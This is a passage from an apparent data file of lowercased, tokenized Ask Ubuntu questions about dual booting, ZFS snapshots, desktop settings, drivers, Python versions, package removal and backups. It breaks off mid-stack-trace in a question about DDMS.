: __________________________________________________________________________ file system : vfat boot sector type : syslinux 4.05 2011-12-09 boot sector info : syslinux looks at sector 2652248 of /dev/sdb1 for its second stage . syslinux is installed in the directory . no errors found in the boot parameter block . operating system : boot files : /boot/grub/grub.cfg /syslinux/syslinux.cfg /efi/boot/bootx64.efi /ldlinux.sys ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 256.1 gb , 256060514304 bytes 255 heads , 63 sectors/track , 31130 cylinders , total 500118192 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 2,048 206,847 204,800 7 ntfs / exfat / hpfs /dev/sda2 206,848 153,602,047 153,395,200 7 ntfs / exfat / hpfs /dev/sda3 153,602,048 154,626,047 1,024,000 83 linux /dev/sda4 154,628,094 500,117,503 345,489,410 5 extended /dev/sda5 154,628,096 492,013,567 337,385,472 83 linux /dev/sda6 492,015,616 500,117,503 8,101,888 82 linux swap / solaris i 've been trying to get this to work for a couple of days with no luck ! ! i want to end up with a windows 7 & ubuntu dual boot . i do n't mind re-installing ubuntu or recreating partitions but am really stuck .
103360	running utility when user logs out	is there any way by which we can run utility on logging out . there is a server which has account of many users . now if i login to that server i can put utilities in .bashrc , but i want to kill processes automatically ( which were started by me ) when i logged out . so is there any way ? i can only access that server using terminal ( command line utility i.e . no gui access ) .
103369	ubuntu : how to mount zfs snapshot ?	i 'm trying to mount zfs snapshot . it should to be so easy ... but i ca n't do that . i 'm using ubuntu server 11.10 oneric , kernel 3.0.0-15-server . installed zfs from ppa also i 'm using zfs-auto-snapshot . with manually created snapshots the same situations . how to mount zfs snapshot ? root @ us1 : / # zfs list -t snapshot name used avail refer mountpoint tank/www @ zfs-auto-snap_hourly-2012-02-11-1917 0 - 268k - root @ us1 : / # zfs mount tank/www @ zfs-auto-snap_hourly-2012-02-11-1917 /mnt/snapshot/tank/www too many arguments usage : mount mount [ -vo ] [ -o opts ] < -a | filesystem > for the property list , run : zfs set|get for the delegated permission list , run : zfs allow|unallow root @ us1 : / # zfs mount tank/www @ zfs-auto-snap_hourly-2012-02-11-1917 can not open 'tank/www @ zfs-auto-snap_hourly-2012-02-11-1917 ' : operation not applicable to datasets of this type
103374	is there any way to leave window in the foreground in gnome shell when it loses focus ?	my ideal situation : given a full screen window w/o focus ( in the background ) and a smaller window w/ focus ( in the foreground ) , i 'd like to be able to mouse over the full screen window to give it focus ( ie : focus-follow mouse ) so i could do something like entering texts , but leave the smaller window visible in the foreground . the full screen window should move to the foreground when clicked . is this possible or already implemented somewhere ?
103375	problem obtaining ip address when connecting to linksys e4200 with dhcp reservation established	i am having difficulty acquiring an ip address when running off my ubuntu partition and attempting to connect to the cisco linksys e4200 wireless router via wireless which is using dhcp reservation for assigning `` static '' ip addresses based on the adapter 's mac address . dhcp reservation is a feature on the e4200 and e3200 routers that sets certain ip addresses in the pool of dhcp ip address range based on the mac address of the adapter . the ip address assigned is in essence '' fixed '' even within the dhcp range . i am not having problems with this when i boot from the windows partition . also , when i disable dhcp reservation and get an ip address , the conventional way on the ubuntu partition , i do n't have any problems . with dhcp reservation set on the router and when running ubuntu , i can never get an ip address connecting via wireless . i can however get an ip address when i connect via lan . i just wonder if i am the only one who has tried this or anyone else faced the same problem because i believe everything is set up properly . perhaps this is an oversight and has not been tested . thank you .
103378	how do i enable opening a file by double clicking ?	i 've never had this problem before . i just upgraded to 11.10 and now clicking or dubleclicking a file does n't cause it to run in its associated program . clicking works on the unity bar all right , but not on files or folders . i have to right click , and select open . it 's a pain !
103382	can i map windows drives to ubuntu ?	i use dual-boot between linux 11.10 and windows 7 on my laptop . there are windows partitions : c drive - 360 gb d drive - 200 gb e drive - 80 gb i installed ubuntu in on drive f which is 30 gb . the drive e is totally empty and i want to map this drive to ubuntu . is it possible ? if yes then how can i do it ?
103385	how do i make gnome the default desktop ?	every time i restart my computer it auto-logs me into the unity desktop , is there some way to make gnome the default choice , i hate having to log out every time and switch to it .
103387	installing a new kernel on 10.04 because old kernel ca n't install my wireless card	is it possible to install a new kernel to ubuntu 10.04 using a debian package or something ? i have a new machine with the intel centrino advanced-n 6230 for wi-fi but the kernel wo n't detect it ( maybe because it is newer ? ) . i do n't want to use a newer version of ubuntu because i much prefer ubuntu 10.04 . i can not connect to the internet by any means on the new machine ( not even with a wired ethernet connection ) . i need to either have a new kernel or connect to the internet to run an update ( which will hopefully solve the problem ) . i found the driver i need for wifi on here but the minmum supported kernel version is ( 2.6.36 ) . any help , please ? samir
103390	unable to uninstall ubuntu from `` uninstall-wubi.exe ''	i tried to uninstall ubuntu with easybcd and forgot to uninstall it from uninstall-wubi.exe . when i tried to unintsall it from that file , got an error : i have windows 64bit installed as well and i installed ubuntu via wubi . log : never mind , it 's too long ( 478997 letters )
103395	how to install oracle 10g on ubuntu 11.10 ?	is it possible to install oracle 10g on ubuntu 11.10 ? during installation process i got errors like : dpkg : error : requested operation requires superuser privilege
103396	printing problem on shared printer	i 'm using ubuntu 11.10 on two machines . one has a usb printer connected . i want to share this printer with the other over the wireless network . under printing > server > settings : i have publish shared printers connected to this system and allow printing from the internet enabled . all other checkboxes are disabled . when i right click on the printer icon , i can see enabled and shared are ticked . on my other machine , i can now click on add network printer . it finds the machine name of the server and correctly identifies the printer . however , print test page fails . under printer properties the printer state says : processing - unable to connect to printer ; will retry in 30 seconds ... what 's gone wrong ?
103397	deja dup`s `` back up now '' button is not highlighted	i have setup my backup folder and put the automatic backups switch to on . in the overview tab i cant press the `` back up now '' because it is grayed out . i am using ubuntu 11.10 and here is the content of ~/.gconf/apps/deja-dup/ % gconf.xml : $ cat ~/.gconf/apps/deja-dup/ % gconf.xml < ? xml version= '' 1.0 '' ? > < gconf > < entry name= '' delete-after '' mtime= '' 1328975617 '' type= '' int '' value= '' 7 '' / > < entry name= '' periodic-period '' mtime= '' 1328975577 '' type= '' int '' value= '' 1 '' / > < entry name= '' exclude-list '' mtime= '' 1328975572 '' type= '' list '' ltype= '' string '' > < li type= '' string '' > < stringvalue > /home/r2d2/.local/share/trash < /stringvalue > < /li > < /entry > < entry name= '' periodic '' mtime= '' 1328988637 '' type= '' bool '' value= '' true '' / > < entry name= '' backend '' mtime= '' 1328975520 '' type= '' string '' > < stringvalue > file < /stringvalue > < /entry > < /gconf >
103409	upgrading to kernel 3.1 from 3.0.0-15	i 've tried this instruction to install kernel 3.1 but when i checked my kernel version with uname -r command ( after rebooting ) , there was no change and my kernel version was still shown as 3.0.0-15 .
103415	how to add fastdebug jdk build to the alternatives ?	i installed fastdebug build of jdk 6 ( linux x64 version , since there is no ubuntu specific build ) in /usr/lib/jvm directory , manually set during installation process . installation completed successfully ( at least such a message was showed at the end ) . now i have /usr/lib/jvm/jdk.1.6.0_25/fastdebug/bin folder . i ran this command to install ( if it matters ) : sudo java -jar jdk-6u25-ea-bin-b03-linux-amd64-debug-27_feb_2011.jar when i run : sudo update-alternatives -- config java i see all my jvms ( open jdk , sun , etc . ) but there is no fastdebug build in the list to choose . i also ran the following : sudo update-java-alternatives -- jre -s jdk1.6.0_25 but it says : '' directory does not exist : /usr/lib/jvm/jdk.1.6.0_25 '' why so ? the directory does exist ! how to add this jdk to the list ? i have the same problem with ibm 's jdk . i also ca n't add it to the alternatives to select for the same reason ( `` directory does not exist ... '' ) . what did i do wrong ? ps . according to the information on the site , all files are made in fastdebug/bin and fastdebug/jre/bin directories executable using chmod command .
103416	cursor 's stuck on the right side of the screen when using wacom tablet	i am using ubuntu 11.10 x64 . when i move the cursor off the screen on the right side of the screen using my pen-tablet ( as mouse ) , there is no way to move it back again . the only way is to a mouse and move to the left . other sides of the screen are not affected by this . when the cursor is lost on the left , the keyboard is also not responding . please note that the info below shows monitor dfp2 has a resolution of 1920x1200 , but the stylus area is 5104x3712 . using ' $ xsetwacom -- set `` wacom bamboo1 stylus '' maptoouput dfp2 ' or ' $ xsetwacom -- set `` wacom bamboo1 stylus resetarea '' ' set back the area to 5104x3712 . adjusting it manually to 1920x1200 will make the cursor disappear/unusable . is there any way to fix this ? $ fglrxinfo display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : ati radeon hd 4870 x2 opengl version string : 3.3.11399 compatibility profile context display : :0 screen : 1 opengl vendor string : advanced micro devices , inc. opengl renderer string : ati radeon hd 4870 x2 opengl version string : 3.3.11399 compatibility profile context $ xinput -- list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ wacom bamboo1 stylus id=8 [ slave pointer ( 2 ) ] ⎜ ↳ microsoft comfort optical mouse 1000 id=11 [ slave pointer ( 2 ) ] ⎜ ↳ wacom bamboo1 eraser id=12 [ slave pointer ( 2 ) ] ⎜ ↳ wacom bamboo1 cursor id=13 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ power button id=7 [ slave keyboard ( 3 ) ] ↳ logitech logitech usb keyboard id=9 [ slave keyboard ( 3 ) ] ↳ logitech logitech usb keyboard id=10 [ slave keyboard ( 3 ) ] $ xsetwacom -- list devices wacom bamboo1 stylus id : 8 type : stylus wacom bamboo1 eraser id : 12 type : eraser wacom bamboo1 cursor id : 13 type : cursor $ xsetwacom -- version 0.11.0 $ xsetwacom -- get `` wacom bamboo1 stylus '' all option `` area '' `` 0 0 5104 3712 '' 'button ' requires exactly 1 value ( s ) . option `` tooldebuglevel '' `` 0 '' option `` tabletdebuglevel '' `` 0 '' option `` suppress '' `` 2 '' option `` rawsample '' `` 4 '' option `` pressurecurve '' `` 0 0 100 100 '' option `` mode '' `` absolute '' option `` tabletpcbutton '' `` on '' option `` touch '' `` on '' option `` gesture '' `` off '' option `` zoomdistance '' `` 50 '' option `` scrolldistance '' `` 20 '' option `` taptime '' `` 250 '' option `` capacity '' `` -1 '' property 'wacom proximity threshold ' does not exist on device . option `` rotate '' `` none '' property 'wacom wheel buttons ' does not exist on device . property 'wacom wheel buttons ' does not exist on device . property 'wacom wheel buttons ' does not exist on device . property 'wacom wheel buttons ' does not exist on device . property 'wacom strip buttons ' does not exist on device . property 'wacom strip buttons ' does not exist on device . property 'wacom strip buttons ' does not exist on device . property 'wacom strip buttons ' does not exist on device . option `` threshold '' `` 27 '' option `` toolid '' `` '' option `` toolserial '' `` '' option `` tabletid '' `` '' $ xrandr screen 0 : minimum 320 x 200 , current 1920 x 1200 , maximum 1920 x 1920 dfp1 disconnected ( normal left inverted right x axis y axis ) dfp2 connected 1920x1200+0+0 ( normal left inverted right x axis y axis ) 518mm x 324mm 1920x1200 60.0*+ 1920x1080 60.0 + 1680x1050 60.0 + 1440x900 59.9 + 1280x800 60.0 + 1152x648 60.0 + 1600x1200 60.0 1400x1050 60.0 1600x900 60.0 1360x1024 60.0 1280x1024 60.0 1280x960 60.0 1152x864 60.0 1280x768 59.9 1280x720 60.0 1024x768 60.0 800x600 60.3 56.2 720x480 60.0 640x480 60.0 crt1 disconnected ( normal left inverted right x axis y axis ) crt2 disconnected ( normal left inverted right x axis y axis ) tv disconnected ( normal left inverted right x axis y axis ) cv disconnected ( normal left inverted right x axis y axis )
103421	redirecting directories in home partition	i have a 60gb ssd for my / filesystem but for more space i got a 16gb sd card for my /home partition . i 'm worried it wo n't be able to take the amount to write the /home directory . so i was wondering if it would be a good idea to sys-link some directories to a home2 directory i have made in the / partition and i wanted to know what directories i should link . i have already done this with downloads but should i do this using .~/cache or .~/config ?
103422	can not open my external hard drive anymore	i was using it to back up two laptops : an ibm thinkpad running xubuntu 11.10 with a qimo session , and an lg r200 running ubuntu 11.10 . i had previously backed-up both computers , several times using deja dup , into separate folders onto the seagate hard drive . at one point , i copied some files directly into another folder on the seagate , from the r200 without using deja dup . i was in the process of copying some of these files again and got an error message that there was something wrong with a file and the seagate hard drive is blocked . i tried to do a regular back up using deja dup and got a similar error message . the same when i tried to back up the thinkpad . how can i get my seagate 2tb expansion drive to work again ? the error message was this or similar : error mounting : mount exited with exit code 13 : $ mftmirr does not match $ mft ( record 0 ) . failed to mount '/dev/sdb1 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details .
103423	can not backup with dd	using dd to create part . image i always get the msg that there is no storage available on the output file . my cmd . is : sudo dd if=/dev/sdb1 of=/dev/sdc2.disk1.img device sdb1 is my ubuntu 11.10 ext4 root partition 54 gb . in size . device sdc2 is an empty ext4 partition 80 gb . in size on an other external hard drive . same results if devices are mounted or unmounted or if i run dd as root user .
103425	inaccessible windows documents	a few days ago , i installed xubuntu on my computer and since recently has worked perfectly . but i do not have access to the `` documents '' folder on the windows partition anymore . the folder is showed empty . the folder appears empty , but it is not . in fact if i try to create a subfolder i get the message `` unable to create the folder . error input / output . '' can anyone tell me why ?
103426	login screen is rotated	when i turn on the computer , the login screen is rotated . but when i log in to my account , the screen is normal . i have an ati graphics card on an amd laptop . the settings is normal for two user accounts , so i do n't know why it is rotated only in the login screen . please help me .
103432	why is my download speed slow on ubuntu 11.10 ?	unfortunately i am experiencing slow download speeds on ubuntu 11.10 but not on windows vista . my limited knowledge with ubuntu and my subsequent flawed research to resolve the matter suggest , it might be a problem with ath9k .
103437	remove icons from menu	after upgrading to 11.10 a couple of days ago , icons appeared in the menu . now of course i want to get rid of them . i searched on google and it seems like they should have been there all the time but they first appeared after the upgrade , and for me it seems a bit overkill to have both icons and text . and i 'm finding myself not being able to quickly find in the menus as before , strange eh . so i read somewhere about these commands : gconftool -- set /desktop/gnome/interface/menus_has_icons -- type bool false gconftool -- set /desktop/gnome/interface/buttons_have_icons -- type bool false should remove them but it does n't seem to work . any other ideas out there ?
103442	switch audio outputs without using the gui dialog for pulseaudio	i 'm using precise ( development version ) , which means i 'm very much expecting to see bugs . however , this time , it 's fairly important that i find a workaround quickly – and it is a general question . the problem : when i open sound settings from the audio menu or from gnome control center , it simply closes with no question of bug reports . i am too drunk to look at stack traces , and i really want to listen to nellie mckay – loudly . now , i have a usb audio device that 's connected to my speakers . it has no headphone output . i would like to change the output device to my internal audio source – which does have headphone output – so that i can listen to music without bothering the neighbors . for some reason or other , i ca n't open the audio dialog . since pulseaudio seems to be working properly , i need a cli-way to change the audio device that 's used for output for pulseaudio sources . if someone can tell me how to do this , i 'd be very happy . if i get the explanation before i 'm evicted for public disturbance , i 'll consider that a bonus . : )
103448	script to minimize / unminimize window in unity	i use oneiric with unity . i want to make a script that opens onboard if it 's closed minimizes onboard if it 's open unminimizes and focus onboard if it 's minimized i 've tried with wmctrl -r onboard -b toggle , hidden , but it does n't do anything ( i ca n't understand why , other options as wmctrl -r onboard -b toggle , maximized_horz works fine ) . i 've found a more complex script here , it 's made for a terminal , so i only need to replace the terminal with onboard . however , that script does n't work in unity , i 've tested in oneiric and in precise alpha-2 , it can minimize but it ca n't un-minimize/focus and gives this error message : wnck-warning ** : received a timestamp of 0 ; window activation may not function properly . i 've tested the script in gnome-shell in oneiric and it works fine , seems to be a problem only with unity . can somebody help me ? hola . uso oneiric con unity , y quiero hacer un script que abra onboard si está cerrado minimice onboard si está abierto y visible desminimice onboard y lo convierta en la ventana activa si está minimizado he intentado 'wmctrl -r onboard -b toggle , hidden ' pero no hace nada ( no entiendo por qué , otras opciones como 'wmctrl -r onboard -b toggle , maximized_horz ' funcionan bien ) . he encontrado scripts más complicados en la red , como http : //ubuntuforums.org/showthread.php ? t=1464311 ( está hecho para una terminal , solo tendría que cambiar la terminal por onboard ) . sin embargo el script no funciona en unity , lo he testado en oneiric y en precise alpha-2 , minimiza bien pero para desminimizar/enfocar da un error : 'wnck-warning ** : received a timestamp of 0 ; window activation may not function properly ' . he probado el script en gnome-shell en oineiric y funciona bien , así que parece un problema solo con unity . ¿puede ayudarme alguien ? gracias .
103450	`` hardware drivers '' do n't detect my gpu ( nvidia 520m 1gb )	ubuntu ca n't detect my gpu . jockey shows no drivers whatsoever and i ca n't even install the nvidia drivers through sudo apt-get install nvidia-current . that 's what i get : error ! bad return status for module build on kernel : 3.2.0-030200-generic ( x86_64 ) consult the make.log in the build directory /var/lib/dkms/nvidia-current/195.36.24/build/ for more information . dpkg : error processing nvidia-current ( -- configure ) : subprocess installed post-installation script returned error exit status 10 dpkg : dependency problems prevent configuration of nvidia-current-dev : nvidia-current-dev depends on nvidia-current ( > = 195.36.24 ) ; however : package nvidia-current is not configured yet . dpkg : error processing nvidia-current-dev ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of nvidia-glx-185 : nvidia-glx-185 depends on nvidia-current ; however : package nvidia-current is not configured yet . dpkg : error processing nvidia-glx-185 ( -- configure ) : dependency problems - leaving unconfigured processing triggers for python-gmenu ... no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . rebuilding /usr/share/applications/desktop.en_us.utf8.cache ... processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.2.0-030200-generic processing triggers for python-support ... errors were encountered while processing : nvidia-current nvidia-current-dev nvidia-glx-185 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 'm using ubuntu 10.04 and the 3.2.0 kernel . any help ?
103453	big ugly icons in notification area	i 'm using ubuntu 11.10 , with gnome classic de and ambiance theme . i really like it , but one thing is driving me crazy - there are big ugly icons in notification area . i tried with different icon packs without success . how can i change their size , to have ~height as skype and wifi icon ?
103454	what size should my root partition be if i 'd to use like a separate /home partition ?	i thought a basic layout would call for 3 partitions on the 160 gb hdd of my eee netbook . it 's got 1 gb ram so i 'll go with a swap partition the same size . the question is what size my / partition should be . i 'd like to allocate the rest to the /home partition . i was told it neither matters if those are primary or logical nor if they 're at the beginning or end of the disk . can you second that ?
103456	automatically size windows using xfce like in gnome	i would like to drag my windows to the left or right side of the desktop and have them automatically resized like it works with gnome or windows 7 . and to maximize them when dragging them to the top . how is that possible in xfce ?
103457	install pypy ( or other python ) to be the main python	i want to replace the default cpython ( python ) with pypy ( 1.8 ) . will this cause a problem ? ( i ask because python seems to be an important component in ubuntu. ) . i 've built pypy and have installed it on a virtual machine of ubuntu ( i 'm testing this idea out before i do it to my actual machine . so while we can try thing my intention is to accomplish this in `` real life '' as it were. ) . pypy is usable from the anywhere in the system via pypy as opposed to python . pypy my_python_script.py it seems to be installed fine and seems usable . now , i want to make it so that any time i want to use python , it 'll assume i mean pypy . for example , i installed django in to pypy but when i try to run django-admin.py it has no idea what i 'm talking about . i imagine i could accomplish this part by adding wherever django-admin.py is to my $ home variable . that , for now , is aside the point . so , my question is how do i replace standard python with my own preferred version -- in this case , pypy . i 'm revising my question based on the answer thus far -- that replacing cpython in whole is not a good idea as it could foobar the system . i 've read a bit on virtualenv -- looks good but it does n't seem to answer my question ( or , i 'm missing how ) . i want to use pypy for my work in python . development work for things like , django , google app engine and other such nonsense . ( i realize there could be a compatibility issue , i 'll address those with unit tests or some other means . just know , it 's beside the point at the moment . ) so , keeping this in mind , say i want to use pypy instead of python . and for ./django-admin.py to work globally , it 'd have to be installed with the system 's python . how might i configure the system to support these `` global '' python scripts from either pypy or the main system python ?
103459	why apt-get purge wants to install packages while i use -- no-download and -- no-install-recommends ?	i am using debian but i think this can be easily posted here . i have already uninstalled openoffice packages from my debian machine but somehow apt-get put abiword in his place . now i would like to get rid of it as well but when i try to apt-get purge abiword i get this : monkey @ debvirtual : / $ sudo apt-get purge abiword reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libgraphite3 libhyphen0 libmythes-1.2-0 libtextcat-data-utf8 openoffice.org-common openoffice.org-core openoffice.org-gnome openoffice.org-gtk openoffice.org-style-galaxy openoffice.org-style-tango ttf-opensymbol uno-libs3 ure xfonts-mathml suggested packages : openoffice.org-style-industrial openoffice.org-style-hicontrast openoffice.org-style-crystal openoffice.org-style-oxygen openoffice.org-evolution tango-icon-theme java5-runtime cli-uno-bridge otf-stix the following packages will be removed : abiword* abiword-plugin-grammar* abiword-plugin-mathview* gnome-office* the following new packages will be installed : libgraphite3 libhyphen0 libmythes-1.2-0 libtextcat-data-utf8 openoffice.org-common openoffice.org-core openoffice.org-gnome openoffice.org-gtk openoffice.org-style-galaxy openoffice.org-style-tango ttf-opensymbol uno-libs3 ure xfonts-mathml 0 upgraded , 14 newly installed , 4 to remove and 0 not upgraded . need to get 84.4 mb of archives . after this operation , 215 mb of additional disk space will be used . do you want to continue [ y/n ] ? i have tried also both apt-get purge -- no-download abiword abiword-common and apt-get purge -- no-install-recommends abiword abiword-common but the get more or less similar output : monkey @ debvirtual : / $ sudo apt-get purge -- no-download abiword abiword-common reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libgraphite3 libhyphen0 libmythes-1.2-0 libtextcat-data-utf8 openoffice.org-common openoffice.org-core openoffice.org-gnome openoffice.org-gtk openoffice.org-style-galaxy openoffice.org-style-tango ttf-opensymbol uno-libs3 ure xfonts-mathml suggested packages : openoffice.org-style-industrial openoffice.org-style-hicontrast openoffice.org-style-crystal openoffice.org-style-oxygen openoffice.org-evolution tango-icon-theme java5-runtime cli-uno-bridge otf-stix the following packages will be removed : abiword* abiword-common* abiword-plugin-grammar* abiword-plugin-mathview* gnome-office* the following new packages will be installed : libgraphite3 libhyphen0 libmythes-1.2-0 libtextcat-data-utf8 openoffice.org-common openoffice.org-core openoffice.org-gnome openoffice.org-gtk openoffice.org-style-galaxy openoffice.org-style-tango ttf-opensymbol uno-libs3 ure xfonts-mathml 0 upgraded , 14 newly installed , 5 to remove and 0 not upgraded . need to get 84.4 mb of archives . after this operation , 206 mb of additional disk space will be used . do you want to continue [ y/n ] ?
103462	unity gray 's out after 30 minutes	after about 30 20 minutes unity will gray out almost like when a program is not responding i do n't know what to do . please help
103463	partial upgrade : problems authenticating packages	what can i do when my update package manager throws this to me ? error authenticating some packages . continue ? it was not possible to authenticate some packages . this may be a transient network problem . you may want to try again later . see below for a list of unauthenticated packages . xserver-xorg-video-savage edit : trying the following commands sudo apt-get update & & sudo apt-get upgrade [ ... ] reading package lists ... done w : gpg error : http : //ppa.launchpad.net oneiric release : the following signatures were invalid : badsig 0f678a01569113ae launchpad caffeine w : gpg error : http : //ppa.launchpad.net oneiric release : the following signatures could n't be verified because the public key is not available : no_pubkey 3b22ab97af1cdfa9 reading package lists ... done [ ... ]
103464	just installed security updates now all i get is a white screen	i updated the section entitled security updates , now when i try to boot normally i now get a white screen where i would normally log in .
103465	how to get webgl to work in the chromium webbrowser ?	i want to try webgl but i am not able to get it working on my computer . i have the i3-2100 cpu , an asus p8z68-v lx motherboard and no dedicated graphic card . i am using chromium and ubuntu 11.10 can anybody explain to me , how i can get webgl to work on my machine ?
103466	whats the difference between ubuntu 11.10 and ubuntu 11.10 server version ?	i 've just purchased the cd 's from ubuntu , i got a ubuntu 11.10 and a ubuntu 11.10 server edition , is there a large difference between those ?
103469	how do i change my pythonpath to make 3,2 my default python instead of 2.7.2 ?	i have python3.2 located in /usr/lib/python3.2 . i am not sure if that means it 's installed but i assume it is for now . some facts about my system : $ which python /usr/local/bin/python when i type python in terminal i get the following $ python python 2.7.2 ( default , dec 19 2011 , 11:12:13 ) [ gcc 4.4.3 ] on linux2 type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information . then to find the path i do > > > sys.info > > > sys.path [ '' , '/usr/local/lib/python2.7/site-packages/setuptools-0.6c11-py2.7.egg ' , '/usr/local/lib/python2.7/site-packages/pip-1.0.2-py2.7.egg ' , '/usr/local/lib/python2.7/site-packages/pil-1.1.7-py2.7-linux-x86_64.egg ' , '/usr/local/lib/python27.zip ' , '/usr/local/lib/python2.7 ' , '/usr/local/lib/python2.7/plat-linux2 ' , '/usr/local/lib/python2.7/lib-tk ' , '/usr/local/lib/python2.7/lib-old ' , '/usr/local/lib/python2.7/lib-dynload ' , '/usr/local/lib/python2.7/site-packages ' ] so knowing all of this , how do i change my default system python from 2.7.2 to 3.2 ?
103474	iis the 'radeon ' open-source driver ( not fglrx ) able to produce sound through hdmi in 11.10 ( x64 ) ?	just wanted to know if the open drivers provided for the radeon graphics card -- specifically the juniper radeon hd 5700 card -- are able to send sound through hdmi . i 'm not able to do that , but i 'm unsure if it 's because i installed the proprietary drivers , and uninstalled them , or if the audio part of it does n't work with the open driver .
103478	can u help me to make work my amd radeon hd 6470 or a solution in my dell inspiron n5110 ?	well ... ... ... ... ..i have a radeon hd 6470 in my laptop ( inspiron n5110 ) and the trouble is that i cant make work my vga properly , also there is a continuous increase in the temperature of the vga and the fan is always in constantly work ... ... ... .i read something about the overhit in the temperature ... ... ... .but honestly i really need help xd i really like ubuntu and i want use it but this is a real trouble u.u , and something else , when i install the drivers for amd cards from the amd site , later i cant start ubuntu always display some kind of error in the startup well thanks for your help ... ... ... ..
103485	wvdial connection wont support ubuntu software centre	i am using my phone to connect to the internet the default mobile broadband option wont support my nokia phone ( x2-01 ) so i am using wvdial but when using wvdial install button in software centre is in disabled mode ( but install option in menu still works ) but it is not convenient to use same is the case with ubuntu one
103486	how to know if hard drive supports sata3 ( 6gb/s )	what tool can i use to see if a hard drive supports sata3 ( 6gb/s )
103488	graphical errors in gnome-shell	i 've been experiencing major graphical glitches in gnome-shell and its derivatives ( such as cinnamon ) . it 's a bit difficult to explain , so here 's a picture of it . the glitches are present on every menu/modal/etc managed by the shell ( applications such as nautilus seem to be fine ) could it be something to do with my graphics card ? $ fglrxinfo display : :0 screen : 0 opengl vendor string : ati technologies inc. opengl renderer string : ati mobility radeon hd 3400 series opengl version string : 3.3.11005 compatibility profile context
103500	unable to update ubuntu 10.10 installed in macbook pro with dual boot	so , this is my problem : i was able to install ubuntu 11.10 in dual boot in my macbook pro 5.1 with refit . i had to do it twice because first time i installed grub in /sda instad of in /sda3 . anyways , it would n't work : after choosing ubuntu in refit i got the balck screen with the white cursor . someone told me to try with an earlier version , so i installed ubuntu 10.10 . it works fine , but when i update to 11.04 i get the same problem : it wo n't boot ubuntu anymore . any idea of what can i do to update ubuntu ? it looks like a problem with grub but i do n't know how to fix it . thanks !
103505	why does my pc keep disconnecting & reconnecting to my wireless network ?	i seem to be having a bit of trouble here , as my cisco am10 usb wi-fi adapter keeps circling through a loop of connecting & disconnecting from my wireless home network . the network router is a cisco valet plus ( cisco m20 ) , and it works perfectly on my copy of windows 7 home premium , but when i boot into ubuntu 11.10 ( i have a dual-boot configuration on my home pc ) , it loops around and around trying to connect , connecting , disconnecting , and i would greatly appreciate any help that anyone can provide . how can i fix this ( annoying ) problem ? ? ? thanks in advance , everyone ! !
103507	ca n't open ddms	when i open a standalone ddms besides eclipse , it generates the below error . hieund @ hieund : ~ $ ddms 01:51:58 e/ddms : could not open selected vm debug port ( 8700 ) . make sure you do not have another instance of ddms or of the eclipse plugin running . if it 's being used by something else , choose a new port number in the preferences . ( ddms:6904 ) : gtk-warning ** : gtk_widget_size_allocate ( ) : attempt to allocate widget with width -5 and height 17 ( ddms:6904 ) : gtk-warning ** : gtk_widget_size_allocate ( ) : attempt to allocate widget with width -5 and height 17 01:52:18 e/ddms : device offline com.android.ddmlib.adbcommandrejectedexception : device offline at com.android.ddmlib.adbhelper.setdevice ( adbhelper.java:736 ) at com.android.ddmlib.adbhelper.executeremotecommand ( adbhelper.java:373 ) at com.android.ddmlib.device.executeshellcommand ( device.java:364 ) at com.android.ddmuilib.sysinfopanel.loadfromdevice ( sysinfopanel.java:159 ) at com.android.ddmuilib.sysinfopanel.deviceselected ( sysinfopanel.java:126 ) at com.android.ddmuilib.selectiondependentpanel.deviceselected ( selectiondependentpanel.java:52 ) at com.android.ddms.uithread.selectionchanged ( uithread.java:1721 ) at com.android.ddmuilib.devicepanel.notifylisteners ( devicepanel.java:752 ) at com.android.ddmuilib.devicepanel.notifylisteners ( devicepanel.java:740 ) at com.android.ddmuilib.devicepanel.access $ 1100 ( devicepanel.java:56 ) at com.android.ddmuilib.devicepanel $ 1.widgetselected ( devicepanel.java:357 ) at org.eclipse.swt.widgets.typedlistener.handleevent ( unknown source ) at org.eclipse.swt.widgets.eventtable.sendevent ( unknown source ) at org.eclipse.swt.widgets.widget.sendevent ( unknown source ) at org.eclipse.swt.widgets.display.rundeferredevents ( unknown source ) at org.eclipse.swt.widgets.display.readanddispatch ( unknown source ) at com.android.ddms.uithread.runui ( uithread.java:517 ) at com.android.ddms.main.main ( main.java:116 ) 01:52:32 e/ddms : shutting down due to uncaught exception 01:52:32 e/ddms : failed to execute runnable ( java.lang.arrayindexoutofboundsexception : -1 ) org.eclipse.swt.swtexception : failed to execute runnable ( java.lang.arrayindexoutofboundsexception : -1 ) at org.eclipse.swt.swt.error ( unknown source ) at org.eclipse.swt.swt.error ( unknown source ) at org.eclipse.swt.widgets.synchronizer.runasyncmessages ( unknown source ) at org.eclipse.swt.widgets.display.runasyncmessages ( unknown source ) at org.eclipse.swt.widgets.display.readanddispatch ( unknown source ) at com.android.ddms.uithread.runui ( uithread.java:517 ) at com.android.ddms.main.main ( main.java:116 ) caused by : java.lang.arrayindexoutofboundsexception : -1 at org.eclipse.jface.viewers.abstracttableviewer $ virtualmanager.resolveelement ( abstracttableviewer.java:100 ) at org.eclipse.jface.viewers.abstracttableviewer $ 1.handleevent ( abstracttableviewer.java:70 ) at org.eclipse.swt.widgets.eventtable.sendevent ( unknown source ) at org.eclipse.swt.widgets.widget.sendevent ( unknown source ) at 